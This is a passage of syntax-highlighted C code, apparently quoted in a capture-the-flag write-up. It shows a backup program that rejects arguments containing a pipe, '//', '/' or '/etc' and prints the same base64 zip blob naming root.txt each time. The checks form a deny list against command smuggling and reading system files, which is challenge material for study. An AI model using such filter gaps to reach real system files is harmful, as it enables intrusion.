&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="nf">displaySuccess&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="s">&amp;#34;Finished! Encoded backup is below:&lt;/span>&lt;span class="se">\n&lt;/span>&lt;span class="s">&amp;#34;&lt;/span>&lt;span class="p">);&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="nf">puts&lt;/span>&lt;span class="p">(&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="s">&amp;#34;UEsDBDMDAQBjAG++IksAAAAA7QMAABgKAAAIAAsAcm9vdC50eHQBmQcAAgBBRQEIAEbBKBl0rFrayqfbwJ2YyHunnYq1Za6G7XLo8C3RH/hu0fArpS&amp;#34;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="s">&amp;#34;vYauq4AUycRmLuWvPyJk3sF+HmNMciNHfFNLD3LdkGmgwSW8j50xlO6SWiH5qU1Edz340bxpSlvaKvE4hnK/oan4wWPabhw/2rwaaJSXucU+pLgZor&amp;#34;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="s">&amp;#34;Y67Q/Y6cfA2hLWJabgeobKjMy0njgC9c8cQDaVrfE/ZiS1S+rPgz/e2Pc3lgkQ+lAVBqjo4zmpQltgIXauCdhvlA1Pe/BXhPQBJab7NVF6Xm3207Ef&amp;#34;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="s">&amp;#34;D3utbrcuUuQyF+rQhDCKsAEhqQ+Yyp1Tq2o6BvWJlhtWdts7rCubeoZPDBD6Mejp3XYkbSYYbzmgr1poNqnzT5XPiXnPwVqH1fG8OSO56xAvxx2mU2&amp;#34;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="s">&amp;#34;EP+Yhgo4OAghyW1sgV8FxenV8p5c+u9bTBTz/7WlQDI0HUsFAOHnWBTYR4HTvyi8OPZXKmwsPAG1hrlcrNDqPrpsmxxmVR8xSRbBDLSrH14pXYKPY/&amp;#34;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="s">&amp;#34;a4AZKO/GtVMULlrpbpIFqZ98zwmROFstmPl/cITNYWBlLtJ5AmsyCxBybfLxHdJKHMsK6Rp4MO+wXrd/EZNxM8lnW6XNOVgnFHMBsxJkqsYIWlO0MM&amp;#34;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="s">&amp;#34;yU9L1CL2RRwm2QvbdD8PLWA/jp1fuYUdWxvQWt7NjmXo7crC1dA0BDPg5pVNxTrOc6lADp7xvGK/kP4F0eR+53a4dSL0b6xFnbL7WwRpcF+Ate/Ut2&amp;#34;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="s">&amp;#34;2WlFrg9A8gqBC8Ub1SnBU2b93ElbG9SFzno5TFmzXk3onbLaaEVZl9AKPA3sGEXZvVP+jueADQsokjJQwnzg1BRGFmqWbR6hxPagTVXBbQ+hytQdd2&amp;#34;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="s">&amp;#34;6PCuhmRUyNjEIBFx/XqkSOfAhLI9+Oe4FH3hYqb1W6xfZcLhpBs4Vwh7t2WGrEnUm2/F+X/OD+s9xeYniyUrBTEaOWKEv2NOUZudU6X2VOTX6QbHJr&amp;#34;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="s">&amp;#34;yLdSU9XLHB+nEGeq+sdtifdUGeFLct+Ee2pgR/AsSexKmzW09cx865KuxKnR3yoC6roUBb30Ijm5vQuzg/RM71P5ldpCK70RemYniiNeluBfHwQLOx&amp;#34;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="s">&amp;#34;kDn/8MN0CEBr1eFzkCNdblNBVA7b9m7GjoEhQXOpOpSGrXwbiHHm5C7Zn4kZtEy729ZOo71OVuT9i+4vCiWQLHrdxYkqiC7lmfCjMh9e05WEy1EBmP&amp;#34;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="s">&amp;#34;aFkYgxK2c6xWErsEv38++8xdqAcdEGXJBR2RT1TlxG/YlB4B7SwUem4xG6zJYi452F1klhkxloV6paNLWrcLwokdPJeCIrUbn+C9TesqoaaXASnict&amp;#34;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="s">&amp;#34;zNXUKzT905OFOcJwt7FbxyXk0z3FxD/tgtUHcFBLAQI/AzMDAQBjAG++IksAAAAA7QMAABgKAAAIAAsAAAAAAAAAIIC0gQAAAAByb290LnR4dAGZBw&amp;#34;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="s">&amp;#34;ACAEFFAQgAUEsFBgAAAAABAAEAQQAAAB4EAAAAAA==&amp;#34;&lt;/span>&lt;span class="p">);&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="nf">exit&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="mi">0&lt;/span>&lt;span class="p">);&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="p">}&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="k">if&lt;/span> &lt;span class="p">(&lt;/span> &lt;span class="nf">strchr&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="n">argv&lt;/span>&lt;span class="p">[&lt;/span>&lt;span class="mi">3&lt;/span>&lt;span class="p">],&lt;/span> &lt;span class="mi">124&lt;/span>&lt;span class="p">)&lt;/span> &lt;span class="p">)&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="p">{&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="nf">displaySuccess&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="s">&amp;#34;Finished! Encoded backup is below:&lt;/span>&lt;span class="se">\n&lt;/span>&lt;span class="s">&amp;#34;&lt;/span>&lt;span class="p">);&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="nf">puts&lt;/span>&lt;span class="p">(&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="s">&amp;#34;UEsDBDMDAQBjAG++IksAAAAA7QMAABgKAAAIAAsAcm9vdC50eHQBmQcAAgBBRQEIAEbBKBl0rFrayqfbwJ2YyHunnYq1Za6G7XLo8C3RH/hu0fArpS&amp;#34;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="s">&amp;#34;vYauq4AUycRmLuWvPyJk3sF+HmNMciNHfFNLD3LdkGmgwSW8j50xlO6SWiH5qU1Edz340bxpSlvaKvE4hnK/oan4wWPabhw/2rwaaJSXucU+pLgZor&amp;#34;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="s">&amp;#34;Y67Q/Y6cfA2hLWJabgeobKjMy0njgC9c8cQDaVrfE/ZiS1S+rPgz/e2Pc3lgkQ+lAVBqjo4zmpQltgIXauCdhvlA1Pe/BXhPQBJab7NVF6Xm3207Ef&amp;#34;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="s">&amp;#34;D3utbrcuUuQyF+rQhDCKsAEhqQ+Yyp1Tq2o6BvWJlhtWdts7rCubeoZPDBD6Mejp3XYkbSYYbzmgr1poNqnzT5XPiXnPwVqH1fG8OSO56xAvxx2mU2&amp;#34;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="s">&amp;#34;EP+Yhgo4OAghyW1sgV8FxenV8p5c+u9bTBTz/7WlQDI0HUsFAOHnWBTYR4HTvyi8OPZXKmwsPAG1hrlcrNDqPrpsmxxmVR8xSRbBDLSrH14pXYKPY/&amp;#34;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="s">&amp;#34;a4AZKO/GtVMULlrpbpIFqZ98zwmROFstmPl/cITNYWBlLtJ5AmsyCxBybfLxHdJKHMsK6Rp4MO+wXrd/EZNxM8lnW6XNOVgnFHMBsxJkqsYIWlO0MM&amp;#34;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="s">&amp;#34;yU9L1CL2RRwm2QvbdD8PLWA/jp1fuYUdWxvQWt7NjmXo7crC1dA0BDPg5pVNxTrOc6lADp7xvGK/kP4F0eR+53a4dSL0b6xFnbL7WwRpcF+Ate/Ut2&amp;#34;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="s">&amp;#34;2WlFrg9A8gqBC8Ub1SnBU2b93ElbG9SFzno5TFmzXk3onbLaaEVZl9AKPA3sGEXZvVP+jueADQsokjJQwnzg1BRGFmqWbR6hxPagTVXBbQ+hytQdd2&amp;#34;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="s">&amp;#34;6PCuhmRUyNjEIBFx/XqkSOfAhLI9+Oe4FH3hYqb1W6xfZcLhpBs4Vwh7t2WGrEnUm2/F+X/OD+s9xeYniyUrBTEaOWKEv2NOUZudU6X2VOTX6QbHJr&amp;#34;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="s">&amp;#34;yLdSU9XLHB+nEGeq+sdtifdUGeFLct+Ee2pgR/AsSexKmzW09cx865KuxKnR3yoC6roUBb30Ijm5vQuzg/RM71P5ldpCK70RemYniiNeluBfHwQLOx&amp;#34;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="s">&amp;#34;kDn/8MN0CEBr1eFzkCNdblNBVA7b9m7GjoEhQXOpOpSGrXwbiHHm5C7Zn4kZtEy729ZOo71OVuT9i+4vCiWQLHrdxYkqiC7lmfCjMh9e05WEy1EBmP&amp;#34;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="s">&amp;#34;aFkYgxK2c6xWErsEv38++8xdqAcdEGXJBR2RT1TlxG/YlB4B7SwUem4xG6zJYi452F1klhkxloV6paNLWrcLwokdPJeCIrUbn+C9TesqoaaXASnict&amp;#34;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="s">&amp;#34;zNXUKzT905OFOcJwt7FbxyXk0z3FxD/tgtUHcFBLAQI/AzMDAQBjAG++IksAAAAA7QMAABgKAAAIAAsAAAAAAAAAIIC0gQAAAAByb290LnR4dAGZBw&amp;#34;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="s">&amp;#34;ACAEFFAQgAUEsFBgAAAAABAAEAQQAAAB4EAAAAAA==&amp;#34;&lt;/span>&lt;span class="p">);&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="nf">exit&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="mi">0&lt;/span>&lt;span class="p">);&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="p">}&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="k">if&lt;/span> &lt;span class="p">(&lt;/span> &lt;span class="nf">strstr&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="n">argv&lt;/span>&lt;span class="p">[&lt;/span>&lt;span class="mi">3&lt;/span>&lt;span class="p">],&lt;/span> &lt;span class="s">&amp;#34;//&amp;#34;&lt;/span>&lt;span class="p">)&lt;/span> &lt;span class="p">)&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="p">{&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="nf">displaySuccess&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="s">&amp;#34;Finished! Encoded backup is below:&lt;/span>&lt;span class="se">\n&lt;/span>&lt;span class="s">&amp;#34;&lt;/span>&lt;span class="p">);&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="nf">puts&lt;/span>&lt;span class="p">(&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="s">&amp;#34;UEsDBDMDAQBjAG++IksAAAAA7QMAABgKAAAIAAsAcm9vdC50eHQBmQcAAgBBRQEIAEbBKBl0rFrayqfbwJ2YyHunnYq1Za6G7XLo8C3RH/hu0fArpS&amp;#34;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="s">&amp;#34;vYauq4AUycRmLuWvPyJk3sF+HmNMciNHfFNLD3LdkGmgwSW8j50xlO6SWiH5qU1Edz340bxpSlvaKvE4hnK/oan4wWPabhw/2rwaaJSXucU+pLgZor&amp;#34;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="s">&amp;#34;Y67Q/Y6cfA2hLWJabgeobKjMy0njgC9c8cQDaVrfE/ZiS1S+rPgz/e2Pc3lgkQ+lAVBqjo4zmpQltgIXauCdhvlA1Pe/BXhPQBJab7NVF6Xm3207Ef&amp;#34;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="s">&amp;#34;D3utbrcuUuQyF+rQhDCKsAEhqQ+Yyp1Tq2o6BvWJlhtWdts7rCubeoZPDBD6Mejp3XYkbSYYbzmgr1poNqnzT5XPiXnPwVqH1fG8OSO56xAvxx2mU2&amp;#34;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="s">&amp;#34;EP+Yhgo4OAghyW1sgV8FxenV8p5c+u9bTBTz/7WlQDI0HUsFAOHnWBTYR4HTvyi8OPZXKmwsPAG1hrlcrNDqPrpsmxxmVR8xSRbBDLSrH14pXYKPY/&amp;#34;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="s">&amp;#34;a4AZKO/GtVMULlrpbpIFqZ98zwmROFstmPl/cITNYWBlLtJ5AmsyCxBybfLxHdJKHMsK6Rp4MO+wXrd/EZNxM8lnW6XNOVgnFHMBsxJkqsYIWlO0MM&amp;#34;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="s">&amp;#34;yU9L1CL2RRwm2QvbdD8PLWA/jp1fuYUdWxvQWt7NjmXo7crC1dA0BDPg5pVNxTrOc6lADp7xvGK/kP4F0eR+53a4dSL0b6xFnbL7WwRpcF+Ate/Ut2&amp;#34;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="s">&amp;#34;2WlFrg9A8gqBC8Ub1SnBU2b93ElbG9SFzno5TFmzXk3onbLaaEVZl9AKPA3sGEXZvVP+jueADQsokjJQwnzg1BRGFmqWbR6hxPagTVXBbQ+hytQdd2&amp;#34;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="s">&amp;#34;6PCuhmRUyNjEIBFx/XqkSOfAhLI9+Oe4FH3hYqb1W6xfZcLhpBs4Vwh7t2WGrEnUm2/F+X/OD+s9xeYniyUrBTEaOWKEv2NOUZudU6X2VOTX6QbHJr&amp;#34;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="s">&amp;#34;yLdSU9XLHB+nEGeq+sdtifdUGeFLct+Ee2pgR/AsSexKmzW09cx865KuxKnR3yoC6roUBb30Ijm5vQuzg/RM71P5ldpCK70RemYniiNeluBfHwQLOx&amp;#34;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="s">&amp;#34;kDn/8MN0CEBr1eFzkCNdblNBVA7b9m7GjoEhQXOpOpSGrXwbiHHm5C7Zn4kZtEy729ZOo71OVuT9i+4vCiWQLHrdxYkqiC7lmfCjMh9e05WEy1EBmP&amp;#34;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="s">&amp;#34;aFkYgxK2c6xWErsEv38++8xdqAcdEGXJBR2RT1TlxG/YlB4B7SwUem4xG6zJYi452F1klhkxloV6paNLWrcLwokdPJeCIrUbn+C9TesqoaaXASnict&amp;#34;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="s">&amp;#34;zNXUKzT905OFOcJwt7FbxyXk0z3FxD/tgtUHcFBLAQI/AzMDAQBjAG++IksAAAAA7QMAABgKAAAIAAsAAAAAAAAAIIC0gQAAAAByb290LnR4dAGZBw&amp;#34;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="s">&amp;#34;ACAEFFAQgAUEsFBgAAAAABAAEAQQAAAB4EAAAAAA==&amp;#34;&lt;/span>&lt;span class="p">);&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="nf">exit&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="mi">0&lt;/span>&lt;span class="p">);&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="p">}&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="k">if&lt;/span> &lt;span class="p">(&lt;/span> &lt;span class="o">!&lt;/span>&lt;span class="nf">strcmp&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="n">argv&lt;/span>&lt;span class="p">[&lt;/span>&lt;span class="mi">3&lt;/span>&lt;span class="p">],&lt;/span> &lt;span class="s">&amp;#34;/&amp;#34;&lt;/span>&lt;span class="p">)&lt;/span> &lt;span class="p">)&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="p">{&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="nf">displaySuccess&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="s">&amp;#34;Finished! Encoded backup is below:&lt;/span>&lt;span class="se">\n&lt;/span>&lt;span class="s">&amp;#34;&lt;/span>&lt;span class="p">);&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="nf">puts&lt;/span>&lt;span class="p">(&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="s">&amp;#34;UEsDBDMDAQBjAG++IksAAAAA7QMAABgKAAAIAAsAcm9vdC50eHQBmQcAAgBBRQEIAEbBKBl0rFrayqfbwJ2YyHunnYq1Za6G7XLo8C3RH/hu0fArpS&amp;#34;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="s">&amp;#34;vYauq4AUycRmLuWvPyJk3sF+HmNMciNHfFNLD3LdkGmgwSW8j50xlO6SWiH5qU1Edz340bxpSlvaKvE4hnK/oan4wWPabhw/2rwaaJSXucU+pLgZor&amp;#34;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="s">&amp;#34;Y67Q/Y6cfA2hLWJabgeobKjMy0njgC9c8cQDaVrfE/ZiS1S+rPgz/e2Pc3lgkQ+lAVBqjo4zmpQltgIXauCdhvlA1Pe/BXhPQBJab7NVF6Xm3207Ef&amp;#34;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="s">&amp;#34;D3utbrcuUuQyF+rQhDCKsAEhqQ+Yyp1Tq2o6BvWJlhtWdts7rCubeoZPDBD6Mejp3XYkbSYYbzmgr1poNqnzT5XPiXnPwVqH1fG8OSO56xAvxx2mU2&amp;#34;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="s">&amp;#34;EP+Yhgo4OAghyW1sgV8FxenV8p5c+u9bTBTz/7WlQDI0HUsFAOHnWBTYR4HTvyi8OPZXKmwsPAG1hrlcrNDqPrpsmxxmVR8xSRbBDLSrH14pXYKPY/&amp;#34;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="s">&amp;#34;a4AZKO/GtVMULlrpbpIFqZ98zwmROFstmPl/cITNYWBlLtJ5AmsyCxBybfLxHdJKHMsK6Rp4MO+wXrd/EZNxM8lnW6XNOVgnFHMBsxJkqsYIWlO0MM&amp;#34;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="s">&amp;#34;yU9L1CL2RRwm2QvbdD8PLWA/jp1fuYUdWxvQWt7NjmXo7crC1dA0BDPg5pVNxTrOc6lADp7xvGK/kP4F0eR+53a4dSL0b6xFnbL7WwRpcF+Ate/Ut2&amp;#34;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="s">&amp;#34;2WlFrg9A8gqBC8Ub1SnBU2b93ElbG9SFzno5TFmzXk3onbLaaEVZl9AKPA3sGEXZvVP+jueADQsokjJQwnzg1BRGFmqWbR6hxPagTVXBbQ+hytQdd2&amp;#34;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="s">&amp;#34;6PCuhmRUyNjEIBFx/XqkSOfAhLI9+Oe4FH3hYqb1W6xfZcLhpBs4Vwh7t2WGrEnUm2/F+X/OD+s9xeYniyUrBTEaOWKEv2NOUZudU6X2VOTX6QbHJr&amp;#34;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="s">&amp;#34;yLdSU9XLHB+nEGeq+sdtifdUGeFLct+Ee2pgR/AsSexKmzW09cx865KuxKnR3yoC6roUBb30Ijm5vQuzg/RM71P5ldpCK70RemYniiNeluBfHwQLOx&amp;#34;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="s">&amp;#34;kDn/8MN0CEBr1eFzkCNdblNBVA7b9m7GjoEhQXOpOpSGrXwbiHHm5C7Zn4kZtEy729ZOo71OVuT9i+4vCiWQLHrdxYkqiC7lmfCjMh9e05WEy1EBmP&amp;#34;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="s">&amp;#34;aFkYgxK2c6xWErsEv38++8xdqAcdEGXJBR2RT1TlxG/YlB4B7SwUem4xG6zJYi452F1klhkxloV6paNLWrcLwokdPJeCIrUbn+C9TesqoaaXASnict&amp;#34;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="s">&amp;#34;zNXUKzT905OFOcJwt7FbxyXk0z3FxD/tgtUHcFBLAQI/AzMDAQBjAG++IksAAAAA7QMAABgKAAAIAAsAAAAAAAAAIIC0gQAAAAByb290LnR4dAGZBw&amp;#34;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="s">&amp;#34;ACAEFFAQgAUEsFBgAAAAABAAEAQQAAAB4EAAAAAA==&amp;#34;&lt;/span>&lt;span class="p">);&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="nf">exit&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="mi">0&lt;/span>&lt;span class="p">);&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="p">}&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="k">if&lt;/span> &lt;span class="p">(&lt;/span> &lt;span class="nf">strstr&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="n">argv&lt;/span>&lt;span class="p">[&lt;/span>&lt;span class="mi">3&lt;/span>&lt;span class="p">],&lt;/span> &lt;span class="s">&amp;#34;/etc&amp;#34;&lt;/span>&lt;span class="p">)&lt;/span> &lt;span class="p">)&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="p">{&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="nf">displaySuccess&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="s">&amp;#34;Finished! Encoded backup is below:&lt;/span>&lt;span class="se">\n&lt;/span>&lt;span class="s">&amp;#34;&lt;/span>&lt;span class="p">);&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="nf">puts&lt;/span>&lt;span class="p">(&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="s">&amp;#34;UEsDBDMDAQBjAG++IksAAAAA7QMAABgKAAAIAAsAcm9vdC50eHQBmQcAAgBBRQEIAEbBKBl0rFrayqfbwJ2YyHunnYq1Za6G7XLo8C3RH/hu0fArpS&amp;#34;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="s">&amp;#34;vYauq4AUycRmLuWvPyJk3sF+HmNMciNHfFNLD3LdkGmgwSW8j50xlO6SWiH5qU1Edz340bxpSlvaKvE4hnK/oan4wWPabhw/2rwaaJSXucU+pLgZor&amp;#34;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="s">&amp;#34;Y67Q/Y6cfA2hLWJabgeobKjMy0njgC9c8cQDaVrfE/ZiS1S+rPgz/e2Pc3lgkQ+lAVBqjo4zmpQltgIXauCdhvlA1Pe/BXhPQBJab7NVF6Xm3207Ef&amp;#34;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="s">&amp;#34;D3utbrcuUuQyF+rQhDCKsAEhqQ+Yyp1Tq2o6BvWJlhtWdts7rCubeoZPDBD6Mejp3XYkbSYYbzmgr1poNqnzT5XPiXnPwVqH1fG8OSO56xAvxx2mU2&amp;#34;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="s">&amp;#34;EP+Yhgo4OAghyW1sgV8FxenV8p5c+u9bTBTz/7WlQDI0HUsFAOHnWBTYR4HTvyi8OPZXKmwsPAG1hrlcrNDqPrpsmxxmVR8xSRbBDLSrH14pXYKPY/&amp;#34;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="s">&amp;#34;a4AZKO/GtVMULlrpbpIFqZ98zwmROFstmPl/cITNYWBlLtJ5AmsyCxBybfLxHdJKHMsK6Rp4MO+wXrd/EZNxM8lnW6XNOVgnFHMBsxJkqsYIWlO0MM&amp;#34;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="s">&amp;#34;yU9L1CL2RRwm2QvbdD8PLWA/jp1fuYUdWxvQWt7NjmXo7crC1dA0BDPg5pVNxTrOc6lADp7xvGK/kP4F0eR+53a4dSL0b6xFnbL7WwRpcF+Ate/Ut2&amp;#34;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="s">&amp;#34;2WlFrg9A8gqBC8Ub1SnBU2b93ElbG9SFzno5TFmzXk3onbLaaEVZl9AKPA3sGEXZvVP+jueADQsokjJQwnzg1BRGFmqWbR6hxPagTVXBbQ+hytQdd2&amp;#34;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="s">&amp;#34;6PCuhmRUyNjEIBFx/XqkSOfAhLI9+Oe4FH3hYqb1W6xfZcLhpBs4Vwh7t2WGrEnUm2/F+X/OD+s9xeYniyUrBTEaOWKEv2NOUZudU6X2VOTX6QbHJr&amp;#34;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="s">&amp;#34;yLdSU9XLHB+nEGeq+sdtifdUGeFLct+Ee2pgR/AsSexKmzW09cx865KuxKnR3yoC6roUBb30Ijm5vQuzg/RM71P5ldpCK70RemYniiNeluBfHwQLOx&amp;#34;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="s">&amp;#34;kDn/8MN0CEBr1eFzkCNdblNBVA7b9m7GjoEhQXOpOpSGrXwbiHHm5C7Zn4kZtEy729ZOo71OVuT9i+4vCiWQLHrdxYkqiC7lmfCjMh9e05WEy1EBmP&amp;#34;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="s">&amp;#34;aFkYgxK2c6xWErsEv38++8xdqAcdEGXJBR2RT1TlxG/YlB4B7SwUem4xG6zJYi452F1klhkxloV6paNLWrcLwokdPJeCIrUbn+C9TesqoaaXASnict&amp;#34;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="s">&amp;#34;zNXUKzT905OFOcJwt7FbxyXk0z3FxD/tgtUHcFBLAQI/AzMDAQBjAG++IksAAAAA7QMAABgKAAAIAAsAAAAAAAAAIIC0gQAAAAByb290LnR4dAGZBw&amp;#34;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="s">&amp;#34;ACAEFFAQgAUEsFBgAAAAABAAEAQQAAAB4EAAAAAA==&amp;#34;&lt;/span>&lt;span class="p">);&lt;/span>
